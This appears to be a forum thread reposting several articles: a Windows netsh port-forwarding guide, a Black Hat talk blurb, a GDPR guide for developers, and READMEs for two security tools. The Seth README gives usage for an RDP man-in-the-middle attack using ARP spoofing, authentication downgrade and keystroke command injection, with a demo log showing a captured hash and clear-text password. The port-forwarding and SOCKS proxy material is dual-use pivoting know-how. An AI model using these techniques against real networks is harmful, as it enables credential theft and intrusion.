service running on your system. And on the network interface for which the port forwarding rule is created, IPv6 support must be enabled. These are the prerequisites for correct port-forwarding. Without the IP Helper service and without IPv6 support enabled, the port redirection does not work. You can find out what process is listening to this port use its PID (in our example, the PID is 636): tasklist | findstr 636 Let’s try to connect to this computer from a remote system using any RDP client. Port 3340 should be specified as the RDP port.It is specified after the colon following the RDP server address, for example, 10.10.1.110:3340: The connection should be established successful. Important. Make sure that your firewall (Windows Firewall or a third-party one that are often included into an antivirus software) allows incoming connections to the new port. If necessary, you can add a new Windows Firewall rule using this command: netsh advfirewall firewall add rule name=”forwarded_RDPport_3340” protocol=TCP dir=in localip=10.1.1.110 localport=3340 action=allow When creating an incoming firewall rule for port 3340 via Windows Firewall graphical interface, no program needs to be associated with it. This port is only listened by the network driver. You can create any number of Windows port forwarding rules. All netsh interface portproxy rules are persistent and are stored in the system after a Windows restart. Display the list of forwarding rules in the system: netsh interface portproxy show all In our case there is only one forwarding rule from port 3340 to 3389: Listen on ipv4: Connect to ipv4: Address Port Address Port --------------- ---------- --------------- ---------- 10.1.1.110 3340 10.1.1.110 3389 Tip. Also, portproxy settings can be obtained as follows: netsh interface portproxy dump #======================== # Port Proxy configuration #======================== pushd interface portproxy reset add v4tov4 listenport=3340 connectaddress=10.1.1.110 connectport=3389 popd # End of Port Proxy configuration To remove a specific port forwarding rule: netsh interface portproxy delete v4tov4 listenport=3340 listenaddress=10.1.1.110 To clear all current port forwarding rules:: netsh interface portproxy reset Important. This forwarding scheme works only for TCP ports. You won’t be able to forward UDP ports this way. Also you can’t use 127.0.0.1 as connectaddress. If you want to forward an incoming TCP connection to another computer, the command can look like this: netsh interface portproxy add v4tov4 listenport=3389 listenaddress=0.0.0.0 connectport=3389 connectaddress=192.168.100.101 This rule will redirect all incoming RDP requests (to port 3389) from this computer to a remote computer with an IP address 192.168.1.101 Another portproxy feature is an opportunity to make it look like any remote network service is operating locally. For example, forward the connection from the local port 5555 to the remote address 157.166.226.25 (CNN website): netsh interface portproxy add v4tov4 listenport=5555 connectport=80 connectaddress= 157.166.226.25 protocol=tcp Now if you go to http://localhost:5555/ in your browser, CNN Start page will open. So despite the browser addresses the local computer, it opens a remote page. Port forwarding can also be used to forward a port from an external address of a network card to a virtual machine port running on the same computer. Also, there were cases when in Windows Server 2012 R2 the port forwarding rules worked only until the system was rebooted, and after restart they were reset. In this case, you need to check whether there are periodic disconnection on the network interface, and whether the IP address changes when the OS boots (it is better to use a static IP). As a workaround, I had to add a script to the Windows scheduler with the netsh interface portproxy rules that run on the system startup. In Windows Server 2003 / XP, you must additionally set the IPEnableRouter parameter to 1 in the registry key HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters. Sursa: http://woshub.com/port-forwarding-in-windows/
-
Black Hat Publicat pe 2 mar. 2018 Your datacenter isn't a bunch of computers, it is *a* computer. While some large organizations have over a decade of experience running software-defined datacenters at massive scale, many more large organizations are just now laying the foundations for their own cloud-scale platforms based on similar ideas. By Dino Dai Zovi
-
Seth Seth is a tool written in Python and Bash to MitM RDP connections by attempting to downgrade the connection in order to extract clear text credentials. It was developed to raise awareness and educate about the importance of properly configured RDP connections in the context of pentests, workshops or talks. The author is Adrian Vollmer (SySS GmbH). Usage Run it like this: $ ./seth.sh <INTERFACE> <ATTACKER IP> <VICTIM IP> <GATEWAY IP|HOST IP> [<COMMAND>] Unless the RDP host is on the same subnet as the victim machine, the last IP address must be that of the gateway. The last parameter is optional. It can contain a command that is executed on the RDP host by simulating WIN+R via key press event injection. Keystroke injection depends on which keyboard layout the victim is using - currently it's only reliable with the English US layout. I suggest avoiding special characters by using powershell -enc <STRING>, where STRING is your UTF-16le and Base64 encoded command. However, calc should be pretty universal and gets the job done. The shell script performs ARP spoofing to gain a Man-in-the-Middle position and redirects the traffic such that it runs through an RDP proxy. The proxy can be called separately. This can be useful if you want use Seth in combination with Responder. Use Responder to gain a Man-in-the-Middle position and run Seth at the same time. Run seth.py -h for more information: usage: seth.py [-h] [-d] [-f] [-p LISTEN_PORT] [-b BIND_IP] [-g {0,1,3,11}] [-j INJECT] -c CERTFILE -k KEYFILE target_host [target_port] RDP credential sniffer -- Adrian Vollmer, SySS GmbH 2017 positional arguments: target_host target host of the RDP service target_port TCP port of the target RDP service (default 3389) optional arguments: -h, --help show this help message and exit -d, --debug show debug information -f, --fake-server perform a 'fake server' attack -p LISTEN_PORT, --listen-port LISTEN_PORT TCP port to listen on (default 3389) -b BIND_IP, --bind-ip BIND_IP IP address to bind the fake service to (default all) -g {0,1,3,11}, --downgrade {0,1,3,11} downgrade the authentication protocol to this (default 3) -j INJECT, --inject INJECT command to execute via key press event injection -c CERTFILE, --certfile CERTFILE path to the certificate file -k KEYFILE, --keyfile KEYFILE path to the key file For more information read the PDF in doc/paper (or read the code!). The paper also contains recommendations for counter measures. You can also watch a twenty minute presentation including a demo (starting at 14:00) on Youtube: https://www.youtube.com/watch?v=wdPkY7gykf4 Demo The following ouput shows the attacker's view. Seth sniffs an offline crackable hash as well as the clear text password. Here, NLA is not enforced and the victim ignored the certificate warning. # ./seth.sh eth1 192.168.57.{103,2,102} ███████╗███████╗████████╗██╗ ██╗ ██╔════╝██╔════╝╚══██╔══╝██║ ██║ by Adrian Vollmer ███████╗█████╗ ██║ ███████║ seth@vollmer.syss.de ╚════██║██╔══╝ ██║ ██╔══██║ SySS GmbH, 2017 ███████║███████╗ ██║ ██║ ██║ https://www.syss.de ╚══════╝╚══════╝ ╚═╝ ╚═╝ ╚═╝ [*] Spoofing arp replies... [*] Turning on IP forwarding... [*] Set iptables rules for SYN packets... [*] Waiting for a SYN packet to the original destination... [+] Got it! Original destination is 192.168.57.102 [*] Clone the x509 certificate of the original destination... [*] Adjust the iptables rule for all packets... [*] Run RDP proxy... Listening for new connection Connection received from 192.168.57.103:50431 Downgrading authentication options from 11 to 3 Enable SSL alice::avollmer-syss:1f20645749b0dfd5:b0d3d5f1642c05764ca28450f89d38db:0101000000000000b2720f48f5ded2012692fcdbf5c79a690000000002001e004400450053004b0054004f0050002d0056004e0056004d0035004f004e0001001e004400450053004b0054004f0050002d0056004e0056004d0035004f004e0004001e004400450053004b0054004f0050002d0056004e0056004d0035004f004e0003001e004400450053004b0054004f0050002d0056004e0056004d0035004f004e0007000800b2720f48f5ded20106000400020000000800300030000000000000000100000000200000413a2721a0d955c51a52d647289621706d6980bf83a5474c10d3ac02acb0105c0a0010000000000000000000000000000000000009002c005400450052004d005300520056002f003100390032002e003100360038002e00350037002e00310030003200000000000000000000000000 Tamper with NTLM response TLS alert access denied, Downgrading CredSSP Connection lost Connection received from 192.168.57.103:50409 Listening for new connection Enable SSL Connection lost Connection received from 192.168.57.103:50410 Listening for new connection Enable SSL Hiding forged protocol request from client .\alice:ilovebob Keyboard Layout: 0x409 (English_United_States) Key press: LShift Key press: S Key release: S Key release: LShift Key press: E Key release: E Key press: C Key release: C Key press: R Key release: R Key press: E Key release: E Key press: T Key release: T Connection lost [*] Cleaning up... [*] Done. Requirements python3 tcpdump arpspoof arpspoof is part of dsniff openssl Disclaimer Use at your own risk. Do not use without full consent of everyone involved. For educational purposes only. Sursa: https://github.com/SySS-Research/Seth
-
GDPR – A Practical Guide For Developers Bozho November 29, 2017 You’ve probably heard about GDPR. The new European data protection regulation that applies practically to everyone. Especially if you are working in a big company, it’s most likely that there’s already a process for getting your systems in compliance with the regulation. The regulation is basically a law that must be followed in all European countries (but also applies to non-EU companies that have users in the EU). In this particular case, it applies to companies that are not registered in Europe, but are having European customers. So that’s most companies. I will not go into yet another “12 facts about GDPR” or “7 myths about GDPR” posts/whitepapers, as they are often aimed at managers or legal people. Instead, I’ll focus on what GDPR means for developers. Why am I qualified to do that? A few reasons – I was advisor to the deputy prime minister of a EU country, and because of that I’ve been both exposed and myself wrote some legislation. I’m familiar with the “legalese” and how the regulatory framework operates in general. I’m also a privacy advocate and I’ve been writing about GDPR-related stuff in the past, i.e. “before it was cool” (protecting sensitive data, the right to be forgotten). And finally, I’m currently working on a project that (among other things) aims to help with covering some GDPR aspects. I’ll try to be a bit more comprehensive this time and cover as many aspects of the regulation that concern developers as I can. And while developers will mostly be concerned about how the systems they are working on have to change, it’s not unlikely that a less informed manager storms in in late spring, realizing GDPR is going to be in force tomorrow, asking “what should we do to get our system/website compliant”. The rights of the user/client (referred to as “data subject” in the regulation) that I think are relevant for developers are: the right to erasure (the right to be forgotten/deleted from the system), right to restriction of processing (you still keep the data, but mark it as “restricted” and don’t touch it without further consent by the user), the right to data portability (the ability to export one’s data in a machine-readable format), the right to rectification (the ability to get personal data fixed), the right to be informed (getting human-readable information, rather than long terms and conditions), the right of access (the user should be able to see all the data you have about them). Additionally, the relevant basic principles are: data minimization (one should not collect more data than necessary), integrity and confidentiality (all security measures to protect data that you can think of + measures to guarantee that the data has not been inappropriately modified). Even further, the regulation requires certain processes to be in place within an organization (of more than 250 employees or if a significant amount of data is processed), and those include keeping a record of all types of processing activities carried out, including transfers to processors (3rd parties), which includes cloud service providers. None of the other requirements of the regulation have an exception depending on the organization size, so “I’m small, GDPR does not concern me” is a myth. It is important to know what “personal data” is. Basically, it’s every piece of data that can be used to uniquely identify a person or data that is about an already identified person. It’s data that the user has explicitly provided, but also data that you have collected about them from either 3rd parties or based on their activities on the site (what they’ve been looking at, what they’ve purchased, etc.) Having said that, I’ll list a number of features that will have to be implemented and some hints on how to do that, followed by some do’s and don’t’s. “Forget me” – you should have a method that takes a userId and deletes all personal data about that user (in case they have been collected on the basis of consent or based on the legitimate interests of the controller (see more below), and not due to contract enforcement or legal obligation). It is actually useful for integration tests to have that feature (to cleanup after the test), but it may be hard to implement depending on the data model. In a regular data model, deleting a record may be easy, but some foreign keys may be violated. That means you have two options – either make sure you allow nullable foreign keys (for example an order usually has a reference to the user that made it, but when the user requests his data be deleted, you can set the userId to null), or make sure you delete all related data (e.g. via cascades). This may not be desirable, e.g. if the order is used to track available quantities or for accounting purposes. It’s a bit trickier for event-sourcing data models, or in extreme cases, ones that include some sort of blockchain/hash chain/tamper-evident data structure. With event sourcing you should be able to remove a past event and re-generate intermediate snapshots. For blockchain-like structures – be careful what you put in there and avoid putting personal data of users. There is an option to use a chameleon hash function, but that’s suboptimal. Overall, you must constantly think of how you can delete the personal data. And “our data model doesn’t allow it” isn’t an excuse. What about backups? Ideally, you should keep a separate table of forgotten user IDs, so that each time you restore a backup, you re-forget the forgotten users. This means the table should be in a separate database or have a separate backup/restore process. Notify 3rd parties for erasure – deleting things from your system may be one thing, but you are also obligated to inform all third parties that you have pushed that data to. So if you have sent personal data to, say, Salesforce, Hubspot, twitter, or any cloud service provider, you should call an API of theirs that allows for the deletion of personal data. If you are such a provider, obviously, your “forget me” endpoint should be exposed. Calling the 3rd party APIs to remove data is not the full story, though. You also have to make sure the information does not appear in search results. Now, that’s tricky, as Google doesn’t have an API for removal, only a manual process. Fortunately, it’s only about public profile pages that are crawlable by Google (and other search engines, okay…), but you still have to take measures. Ideally, you should make the personal data page return a 404 HTTP status, so that it can be removed. Restrict processing – in your admin panel where there’s a list of users, there should be a button “restrict processing”. The user settings page should also have that button. When clicked (after reading the appropriate information), it should mark the profile as restricted. That means it should no longer be visible to the backoffice staff, or publicly. You can implement that with a simple “restricted” flag in the users table and a few if-clasues here and there. Export data – there should be another button – “export data”. When clicked, the user should receive all the data that you hold about them. What exactly is that data – depends on the particular usecase. Usually it’s at least the data that you delete with the “forget me” functionality, but may include additional data (e.g. the orders the user has made may not be delete, but should be included in the dump). The structure of the dump is not strictly defined, but my recommendation would be to reuse schema.org definitions as much as possible, for either JSON or XML. If the data is simple enough, a CSV/XLS export would also be fine. Sometimes data export can take a long time, so the button can trigger a background process, which would then notify the user via email when his data is ready (twitter, for example, does that already – you can request all your tweets and you get them after a while). You don’t need to implement an automated export, although it would be nice. It’s sufficient to have a process in place to allow users to request their data, which can be a manual database-querying process. Allow users to edit their profile – this seems an obvious rule, but it isn’t always followed. Users must be able to fix all data about them, including data that you have collected from other sources (e.g. using a “login with facebook” you may have fetched their name and address). Rule of thumb – all the fields in your “users” table should be editable via the UI. Technically, rectification can be done via a manual support process, but that’s normally more expensive for a business than just having the form to do it. There is one other scenario, however, when you’ve obtained the data from other sources (i.e. the user hasn’t provided their details to you directly). In that case there should still be a page where they can identify somehow (via email and/or sms confirmation) and get access to the data about them. Consent checkboxes – “I accept the terms and conditions” would no longer be sufficient to claim that the user has given their consent for processing their data. So, for each particular processing activity there should be a separate checkbox on the registration (or user profile) screen. You should keep these consent checkboxes in separate columns in the database, and let the users withdraw their consent (by unchecking these checkboxes from their profile page – see the previous point). Ideally, these checkboxes should come directly from the register of processing activities (if you keep one). Note that the checkboxes should not be preselected, as this does not count as “consent”. Another important thing here is machine learning/AI. If you are going to use the user’s data to train your ML models, you should get consent for that as well (unless it’s for scientific purposes, which have special treatment in the regulation). Note here the so called “legitimate interest”. It is for the legal team to decide what a legitimate interest is, but direct marketing is included in that category, as well as any common sense processing relating to the business activity – e.g. if you collect addresses for shipping, it’s obviously a legitimate interest. So not all processing activities need consent checkboxes. Re-request consent – if the consent users have given was not clear (e.g. if they simply agreed to terms & conditions), you’d have to re-obtain that consent. So prepare a functionality for mass-emailing your users to ask them to go to their profile page and check all the checkboxes for the personal data processing activities that you have. “See all my data” – this is very similar to the “Export” button, except data should be displayed in the regular UI of the application rather than an XML/JSON format. I wouldn’t say this is mandatory, and you can leave it as a “desirable” feature – for example, Google Maps shows you your location history – all the places that you’ve been to. It is a good implementation of the right to access. (Though Google is very far from perfect when privacy is concerned). This is not all about the right to access – you have to let unregistered users ask whether you have data about them, but that would be a more manual process. The ideal minimum would be to have a feature “check by email”, where you check if you have data about a particular email. You also need to tell the user in what ways you are processing their data. You can simply print all the records in your data process register for which the user has consented to. Age checks – you should ask for the user’s age, and if the user is a child (below 16), you should ask for parent permission. There’s no clear way how to do that, but my suggestion is to introduce a flow, where the child should specify the email of a parent, who can then confirm. Obviously, children will just cheat with their birthdate, or provide a fake parent email, but you will most likely have done your job according to the regulation (this is one of the “wishful thinking” aspects of the regulation). Keeping data for no longer than necessary – if you’ve collected the data for a specific purpose (e.g. shipping a product), you have to delete it/anonymize it as soon as you don’t need it. Many e-commerce sites offer “purchase without registration”, in which case the consent goes only for the particular order. So you need a scheduled job/cron to periodically go through the data and anonymize it (delete names and addresses), but only after a certain condition is met – e.g. the product is confirmed as delivered. You can have a database field for storing the deadline after which the data should be gone, and that deadline can be extended in case of a delivery problem. Now some “do’s”, which are mostly about the technical measures needed to protect personal data (outlined in article 32). They may be more “ops” than “dev”, but often the application also has to be extended to support them. I’ve listed most of what I could think of in a previous post. An important note here is that this is not mandated by the regulation, but it’s a good practice anyway and helps with protecting personal data. Encrypt the data in transit. That means that communication between your application layer and your database (or your message queue, or whatever component you have) should be over TLS. The certificates could be self-signed (and possibly pinned), or you could have an internal CA. Different databases have different configurations, just google “X encrypted connections. Some databases need gossiping among the nodes – that should also be configured to use encryption Encrypt the data at rest – this again depends on the database (some offer table-level encryption), but can also be done on machine-level. E.g. using LUKS. The private key can be stored in your infrastructure, or in some cloud service like AWS KMS. Encrypt your backups – kind of obvious Implement pseudonymisation – the most obvious use-case is when you want to use production data for the test/staging servers. You should change the personal data to some “pseudonym”, so that the people cannot be identified. When you push data for machine learning purposes (to third parties or not), you can also do that. Technically, that could mean that your User object can have a “pseudonymize” method which applies hash+salt/bcrypt/PBKDF2 for some of the data that can be used to identify a person. Pseudonyms could be reversible or not, depending on the usecase (the definition in the regulation implies reversibility based on a secret information, but in the case of test/staging data it might not be). Some databases have such features built-in, e.g. Orale. Protect data integrity – this is a very broad thing, and could simply mean “have authentication mechanisms for modifying data”. But you can do something more, even as simple as a checksum, or a more complicated solution (like the one I’m working on). It depends on the stakes, on the way data is accessed, on the particular system, etc. The checksum can be in the form of a hash of all the data in a given database record, which should be updated each time the record is updated through the application. It isn’t a strong guarantee, but it is at least something. Have your GDPR register of processing activities in something other than Excel – Article 30 says that you should keep a record of all the types of activities that you use personal data for. That sounds like bureaucracy, but it may be useful – you will be able to link certain aspects of your application with that register (e.g. the consent checkboxes, or your audit trail records). It wouldn’t take much time to implement a simple register, but the business requirements for that should come from whoever is responsible for the GDPR compliance. But you can advise them that having it in Excel won’t make it easy for you as a developer (imagine having to fetch the excel file internally, so that you can parse it and implement a feature). Such a register could be a microservice/small application deployed separately in your infrastructure. Log access to personal data – every read operation on a personal data record should be logged, so that you know who accessed what and for what purpose. This does not follow directly from the provisions of the regulation, but it is kinda implied from the accountability principles. What about search results (or lists) that contain personal data about multiple subjects? My hunch is that simply logging “user X did a search for criteria Y” would suffice. But don’t display too many personal data in lists – for example see how facebook makes you go through some hoops to get a person’s birthday. Note: some have treated article 30 as a requirement to keep an audit log. I don’t think it is saying that – instead it requires 250+ companies (or companies processing data regularly) to keep a register of the types of processing activities (i.e. what you use the data for). There are other articles in the regulation that imply that keeping an audit log is a best practice (for protecting the integrity of the data as well as to make sure it hasn’t been processed without a valid reason) Register all API consumers – you shouldn’t allow anonymous API access to personal data. I’d say you should request the organization name and contact person for each API user upon registration, and add those to the data processing register. Finally, some “don’t’s”. Don’t use data for purposes that the user hasn’t agreed with – that’s supposed to be the spirit of the regulation. If you want to expose a new API to a new type of clients, or you want to use the data for some machine learning, or you decide to add ads to your site based on users’ behaviour, or sell your database to a 3rd party – think twice. I would imagine your register of processing activities could have a button to send notification emails to users to ask them for permission when a new processing activity is added (or if you use a 3rd party register, it should probably give you an API). So upon adding a new processing activity (and adding that to your register), mass email all users from whom you’d like consent. Note here that additional legitimate interests of the controller might be added dynamically. Don’t log personal data – getting rid of the personal data from log files (especially if they are shipped to a 3rd party service) can be tedious or even impossible. So log just identifiers if needed. And make sure old logs files are cleaned up, just in case Don’t put fields on the registration/profile form that you don’t need – it’s always tempting to just throw as many fields as the usability person/designer agrees on, but unless you absolutely need the data for delivering your service, you shouldn’t collect it. Names you should probably always collect, but unless you are delivering something, a home address or phone is unnecessary. Don’t assume 3rd parties are compliant – you are responsible if there’s a data breach in one of the 3rd parties (e.g. “processors”) to which you send personal data. So before you send data via an API to another service, make sure they have at least a basic level of data protection. If they don’t, raise a flag with management. Don’t assume having ISO XXX makes you compliant – information security standards and even personal data standards are a good start and they will probably 70% of what the regulation requires, but they are not sufficient – most of the things listed above are not covered in any of those standards Overall, the purpose of the regulation is to make you take conscious decisions when processing personal data. It imposes best practices in a legal way. If you follow the above advice and design your data model, storage, data flow , API calls with data protection in mind, then you shouldn’t worry about the huge fines that the regulation prescribes – they are for extreme cases, like Equifax for example. Regulators (data protection authorities) will most likely have some checklists into which you’d have to somehow fit, but if you follow best practices, that shouldn’t be an issue. I think all of the above features can be implemented in a few weeks by a small team. Be suspicious when a big vendor offers you a generic plug-and-play “GDPR compliance” solution. GDPR is not just about the technical aspects listed above – it does have organizational/process implications. But also be suspicious if a consultant claims GDPR is complicated. It’s not – it relies on a few basic principles that are in fact best practices anyway. Just don’t ignore them. Sursa: https://techblog.bozho.net/gdpr-practical-guide-developers/
-
Invoke-SocksProxy Creates a Socks proxy using powershell. Supports both Socks4 and Socks5 connections. Examples Create a Socks 4/5 proxy on port 1234: Import-Module .\Invoke-SocksProxy.psm1 Invoke-SocksProxy -bindPort 1234 Create a simple tcp port forward: Import-Module .\Invoke-SocksProxy.psm1 Invoke-PortFwd -bindPort 33389 -destHost 127.0.0.1 -destPort 3389 Limitations This is only a subset of the Socks 4 and 5 protocols: It does not support authentication, It does not support UDP or bind requests. Used connections are not always dismissed, causing a memory leak. New features will be implemented in the future. PR are welcome. Sursa: https://github.com/p3nt4/Invoke-SocksProxy